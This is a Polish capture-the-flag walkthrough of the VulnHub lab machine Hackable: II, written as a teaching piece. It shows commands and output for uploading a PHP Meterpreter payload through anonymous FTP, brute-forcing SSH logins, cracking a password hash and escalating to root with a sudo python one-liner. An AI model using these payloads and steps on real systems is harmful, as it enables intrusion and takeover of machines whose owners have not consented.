Hackable: II

Write-up is in Polish language.

Metainfo

Nazwa: Hackable: II
Autor: Elias-sousa
Wypuszczony: 2021-06-15
Do ściągnięcia: Vulnhub
Poziom: Łatwy
System: Linux
Nauczysz się: Metasploit i moduły

Wstęp

Hackable: II autora jest bardzo prostą maszyną do złamania, nawet prostszą niż wcześniej opisywany Hackathonctf-1. Dzisiaj oprzemy się głównie na Metasploicie, a z dodatkowych narzędzi postaramy się korzystać jak najmniej. Ten tutorial jest skierowany do bardzo początkujących. Jeżeli przejdziesz tę maszynę z pomocą tego wpisu, spróbuj jeszcze raz, tylko już samodzielnie.

Zaczynamy:

Tradycyjnie odpalamy Metasploita. Zakładam, że baza Metasploita na Postgresie jest już utworzona. to jest potrzebne, żeby zapisywać nasze wyniki. Inaczej nie stworzymy obszaru roboczego:

msf6 > workspace -a hackable2
[*] Added workspace: hackable2
[*] Workspace: hackable2
msf6 >

Skanujemy naszą maszynkę:

msf6 > db_nmap -A -p- 172.16.1.244
..........
..........
msf6 > services
Services
========

host     port proto name state info
----     ---- ----- ---- ----- ----
172.16.1.244 21  tcp  ftp  open  ProFTPD
172.16.1.244 22  tcp  ssh  open  OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 Ubuntu Linux; protocol 2.0
172.16.1.244 80  tcp  http open  Apache httpd 2.4.18 (Ubuntu)

Widać 3 otwarte porty. Sprawdźmy czy można wejść na FTP przez Anonymous:

msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > set rhosts 172.16.1.244
rhosts => 172.16.1.244
msf6 auxiliary(scanner/ftp/anonymous) > run

[+] 172.16.1.244:21    - 172.16.1.244:21 - Anonymous READ/WRITE (220 ProFTPD Server (ProFTPD Default Installation) [172.16.1.244])
[*] 172.16.1.244:21    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Można wejść. Na FTP jest plik CALL.html, można też wrzucać swoje pliki, więc mamy podatność.

-rw-r--r--  1 0    0       109 Nov 26 2020 CALL.html

SSH nie skanujemy. Na WWW jest strona z konfiguracją Apache. apache Tak, jak wspomniałem wcześniej, wykorzystujemy na maksa Metasploita, więc użyjmy plugin Wmap do przeskanowania stronki:

msf6 auxiliary(scanner/ftp/anonymous) > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf6 auxiliary(scanner/ftp/anonymous) > wmap_sites -a http://172.16.1.244
[*] Site created.
msf6 auxiliary(scanner/ftp/anonymous) >
msf6 auxiliary(scanner/ftp/anonymous) > wmap_run -e
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*]   Site: 172.16.1.244 (172.16.1.244)
[*]   Port: 80 SSL: false
..........
..........

Zobaczmy co nam Wmap znalazł:

msf6 auxiliary(scanner/ftp/anonymous) > wmap_vulns -l
[*] + [172.16.1.244] (172.16.1.244): scraper /
[*]   scraper Scraper
[*]   GET Apache2 Ubuntu Default Page: It works
[*] + [172.16.1.244] (172.16.1.244): directory /files/
[*]   directory Directory found.
[*]   GET Res code: 404
[*] + [172.16.1.244] (172.16.1.244): directory /icons/
[*]   directory Directory found.
[*]   GET Res code: 403
[*] + [172.16.1.244] (172.16.1.244): file /index.html
[*]   file File found.
[*]   GET Res code: 404
[*] + [172.16.1.244] (172.16.1.244): file /files
[*]   file File found.
[*]   GET Res code: 301

Voilà – jest katalog files, a w nim plik CALL.html, tak jak na było FTP. To jest to samo, tylko widoczne z innych źródeł. Wchodząc na http://172.16.1.244/files/CALL.html nic ciekawego nie znajdziemy, chociaż w tytule strony jest onion. Nazwa nam nic nie mówi. Jednak wychodzi, że strona WWW jest powiązana z FTP. Przez FTP wrzucamy plik, a przez WWW go odpalamy. Oczywiście do tego użyjemy Metasploita (oprócz wrzutki przez FTP). Najlepsze ładunki są z ładunkiem Meterpretera, więc ich szukajmy:

# root@kali:~# msfvenom -p php/meterpreter/bind_tcp LPORT=5555 > php_meterpreter_bind_tcp.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1338 bytes

Jeżeli nam Windows wykryje, że ten ładunek to wirus, to należy go zaciemnić i potem wyedytować plik: na początku dodać <?php, na końcu ?>

# root@kali:~# msfvenom -e php/base64 -p php/meterpreter/bind_tcp LPORT=5555 > php_meterpreter_bind_tcp.php

Do katalogu files wrzucamy php_meterpreter_bind_tcp.php, ale zanim odświeżymy i uruchomimy na stronie, to załadujmy nasz ładunek i exploita w Msfconsole:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > set rhost 172.16.1.244
rhost => 172.16.1.244
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

  Name Current Setting Required Description
  ---- --------------- -------- -----------


Payload options (php/meterpreter/bind_tcp):

  Name  Current Setting Required Description
  ----  --------------- -------- -----------
  LPORT 5555       yes    The listen port
  RHOST 172.16.1.244   no    The target address


Exploit target:

  Id Name
  -- ----
  0  Wildcard Target


msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started bind TCP handler against 172.16.1.244:5555
[*] Sending stage (39282 bytes) to 172.16.1.244
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.16.1.244:5555) at 2021-07-29 21:39:28 +0200
sessions

Active sessions
===============

 Id Name Type          Information       Connection
 -- ---- ----          -----------       ----------
 1     meterpreter php/linux www-data (33) @ ubuntu 0.0.0.0:0 -> 172.16.1.244:5555 (172.16.1.244)

Najlepiej użyć tego samego ładunku do Metasploita i ten, co wrzucamy na atakowany serwer. (Zadanie dla czytelnika. Spróbuj sam stworzyć ładunek i się połączyć, ale tym razem przez payload/php/meterpreter_reverse_tcp).

Mamy sesję i możemy eksplorować podatny serwer. Teraz użyjemy modułów powłamaniowych, żeby ściągnąć trochę informacji na nasz komputer. Użyjemy dwóch modułów:

 • post/linux/gather/enum_system
 • post/linux/gather/enum_users_history
msf6 exploit(multi/handler) > use post/linux/gather/enum_system
msf6 post(linux/gather/enum_system) > show options

Module options (post/linux/gather/enum_system):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  SESSION          yes    The session to run this module on.

msf6 post(linux/gather/enum_system) > set session 1
session => 1
msf6 post(linux/gather/enum_system) > run

[!] SESSION may not be compatible with this module (missing Meterpreter features: core commands)
[+] Info:
[+]   Ubuntu 16.04.7 LTS
[+]   Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[+]   Module running as "www-data" user
[*] Linux version stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_823874.txt
[*] User accounts stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_792608.txt
[*] Installed Packages stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_940047.txt
[*] Running Services stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_790666.txt
[*] Cron jobs stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_485080.txt
[*] Disk info stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_296708.txt
[*] Logfiles stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_341841.txt
[*] Setuid/setgid files stored in /root/.msf4/loot/20210729214801_default_172.16.1.244_linux.enum.syste_709424.txt
[*] CPU Vulnerabilities stored in /root/.msf4/loot/20210729214802_default_172.16.1.244_linux.enum.syste_388295.txt
[*] Post module execution completed
msf6 post(linux/gather/enum_system) > loot

komenda loot pozwala nam wyświetlić, to co ściągnęliśmy.

w pliku 20210729214957_default_172.16.1.244_linux.enum.syste_656649.txt mamy użytkowników z podatnej maszyny

moduł post/linux/gather/enum_users_history sciagnie nam plik Sudoers

Moduł auxiliary/scanner/ssh/ssh_login pozwala nam dosyć pobieżnie przeskanować użytkowników i przy okazji ustawić sesję, jeżeli login i hasło będą poprawnę. Również może się przydać do ustawienia sesji w Metasploicie, jeżeli znamy tylko login i hasło. Sprawdźmy czy użytkownicy mają jakieś słabe hasła na systemie. Niestety ten moduł jest dosyć wolny, ale może coś znajdziemy. W parametrach podajemy, żeby używał hasła jako loginu, również podajemy ścieżkę do pliku gdzie zostali zapisani użytkownicy z obrazu hackable II. Verbose należy ustawić na yes, wtedy widać na bieżąco pracę modułu.

msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.1.244:22 - Starting bruteforce
[-] 172.16.1.244:22 - Failed: 'root:root'
[!] No active DB -- Credential data will not be saved!
[-] 172.16.1.244:22 - Failed: 'root:'
[-] 172.16.1.244:22 - Failed: 'daemon:daemon'
[-] 172.16.1.244:22 - Failed: 'daemon:'
[-] 172.16.1.244:22 - Failed: 'bin:bin'
[-] 172.16.1.244:22 - Failed: 'bin:'
[-] 172.16.1.244:22 - Failed: 'sys:sys'
[-] 172.16.1.244:22 - Failed: 'sys:'
[-] 172.16.1.244:22 - Failed: 'sync:sync'
[-] 172.16.1.244:22 - Failed: 'sync:'
[-] 172.16.1.244:22 - Failed: 'games:games'
[-] 172.16.1.244:22 - Failed: 'games:'
[-] 172.16.1.244:22 - Failed: 'man:man'
[-] 172.16.1.244:22 - Failed: 'man:'
[-] 172.16.1.244:22 - Failed: 'lp:lp'
[-] 172.16.1.244:22 - Failed: 'lp:'
[-] 172.16.1.244:22 - Failed: 'mail:mail'
[-] 172.16.1.244:22 - Failed: 'mail:'
[-] 172.16.1.244:22 - Failed: 'news:news'
[-] 172.16.1.244:22 - Failed: 'news:'
[-] 172.16.1.244:22 - Failed: 'uucp:uucp'
[-] 172.16.1.244:22 - Failed: 'uucp:'
[-] 172.16.1.244:22 - Failed: 'proxy:proxy'
[-] 172.16.1.244:22 - Failed: 'proxy:'
[-] 172.16.1.244:22 - Failed: 'www-data:www-data'
[-] 172.16.1.244:22 - Failed: 'www-data:'
[-] 172.16.1.244:22 - Failed: 'backup:backup'
[-] 172.16.1.244:22 - Failed: 'backup:'
[-] 172.16.1.244:22 - Failed: 'list:list'
[-] 172.16.1.244:22 - Failed: 'list:'
[-] 172.16.1.244:22 - Failed: 'irc:irc'
[-] 172.16.1.244:22 - Failed: 'irc:'
[-] 172.16.1.244:22 - Failed: 'gnats:gnats'
[-] 172.16.1.244:22 - Failed: 'gnats:'
[-] 172.16.1.244:22 - Failed: 'nobody:nobody'
[-] 172.16.1.244:22 - Failed: 'nobody:'
[-] 172.16.1.244:22 - Failed: 'systemd-timesync:systemd-timesync'
[-] 172.16.1.244:22 - Failed: 'systemd-timesync:'
[-] 172.16.1.244:22 - Failed: 'systemd-network:systemd-network'
[-] 172.16.1.244:22 - Failed: 'systemd-network:'
[-] 172.16.1.244:22 - Failed: 'systemd-resolve:systemd-resolve'
[-] 172.16.1.244:22 - Failed: 'systemd-resolve:'
[-] 172.16.1.244:22 - Failed: 'systemd-bus-proxy:systemd-bus-proxy'
[-] 172.16.1.244:22 - Failed: 'systemd-bus-proxy:'
[-] 172.16.1.244:22 - Failed: 'syslog:syslog'
[-] 172.16.1.244:22 - Failed: 'syslog:'
[-] 172.16.1.244:22 - Failed: '_apt:_apt'
[-] 172.16.1.244:22 - Failed: '_apt:'
[-] 172.16.1.244:22 - Failed: 'lxd:lxd'
[-] 172.16.1.244:22 - Failed: 'lxd:'
[-] 172.16.1.244:22 - Failed: 'messagebus:messagebus'
[-] 172.16.1.244:22 - Failed: 'messagebus:'
[-] 172.16.1.244:22 - Failed: 'uuidd:uuidd'
[-] 172.16.1.244:22 - Failed: 'uuidd:'
[-] 172.16.1.244:22 - Failed: 'dnsmasq:dnsmasq'
[-] 172.16.1.244:22 - Failed: 'dnsmasq:'
[-] 172.16.1.244:22 - Failed: 'shrek:shrek'
[-] 172.16.1.244:22 - Failed: 'shrek:'
[+] 172.16.1.244:22 - Success: 'ftp:ftp' 'Could not chdir to home directory /home/ftp: No such file or directory uid=1001(ftp) gid=1001(ftp) groups=1001(ftp) Could not chdir to home directory /home/ftp: No such file or directory Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 7 opened (172.16.1.10:39345 -> 172.16.1.244:22) at 2021-07-29 20:06:46 +0200
[-] 172.16.1.244:22 - Failed: 'colord:colord'
[-] 172.16.1.244:22 - Failed: 'colord:'
[-] 172.16.1.244:22 - Failed: 'sshd:sshd'
[-] 172.16.1.244:22 - Failed: 'sshd:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Wchodzimy na serwer

Użytkownik ftp ma hasło ftp :smiley: Mamy też na to sesję. Żeby połączyć się z wygodnym Meterpreterem użyjemy modułu multi/manage/shell_to_meterpreter. W module wpisujemy nr sesji. Teraz już zwykłe szukanie dziury w całym… ;) W katalogu /home jest plik important.txt. W nim zaś zawartość:

important.txt

run the script to see the data /.runme.sh

Zobaczmy co to za plik:

.runme.sh

echo 'the secret key' sleep 2 echo 'is' sleep 2 echo 'trolled' sleep 2 echo 'restarting computer in 3 seconds...' sleep 1 echo 'restarting computer in 2 seconds...' sleep 1 echo 'restarting computer in 1 seconds...' sleep 1 echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀ ⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀ ⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆ ⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆ ⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆ ⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿ ⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉ ⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇ ⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇ ⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇ ⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇ ⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇ ⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ shrek:cf4c2232354952690368f1b3dfdfb24d'

Na samym dole jest hasło. Hashcat i słownik rockyou.txt szybko się z nim uporają. Hasło to onion, ale przecież to było w tytule strony http://172.16.1.244/files/CALL.html. Proste maszyny do złamania czasami są bardzo proste.

Wchodzimy na konto shreka.

# cat user.txt

Wyświetli się obrazek (sam zobacz jaki :smiley: ). Jeszcze zostało wejść na roota. Mamy plik Sudoers, a tam jest taka ciekawa linijka:

Sudoers

... %shrek ALL = NOPASSWD:/usr/bin/python3.5 ...

Program python3.5 ma uprawnienia roota, ale tylko z grupy shrek. Trzeba to wykorzystać.

-rwxr-xr-x 2 root root 4460304 Oct 9 2020 /usr/bin/python3.5

Najpierw należy się połączyć na sesję nr 10. Tam wpisujemy shell. Bez Shella nie odpali się nam Sudo:

 Id Name Type     Information            Connection
 -- ---- ----     -----------            ----------
 2     shell linux SSH ftp:ftp (172.16.1.244:22)   172.16.1.10:41053 -> 172.16.1.244:22 (172.16.1.244)
 10    shell linux SSH shrek:onion (172.16.1.244:22) 172.16.1.10:44865 -> 172.16.1.244:22 (172.16.1.244)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions 10
[*] Starting interaction with 10...
sudo: no tty present and no askpass program specified
shell

[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash

# root@ubuntu:~# sudo python3.5 -c 'import os; os.system("/bin/bash");'
# sudo python3.5 -c 'import os; os.system("/bin/bash");'
# root@ubuntu:~# id
# id
uid=0(root) gid=0(root) groups=0(root)
# root@ubuntu:~# cat /root/root.txt

Wyświetli się obrazek. Jednak wolałbym użyć dodatkowych narzędzi, ale chciałem pokazać siłę Metasploita. Jeżeli się podobał wpis napisz na kerszi@protonmail.com lub skomentuj (jeżeli się da).

Zostaw komentarz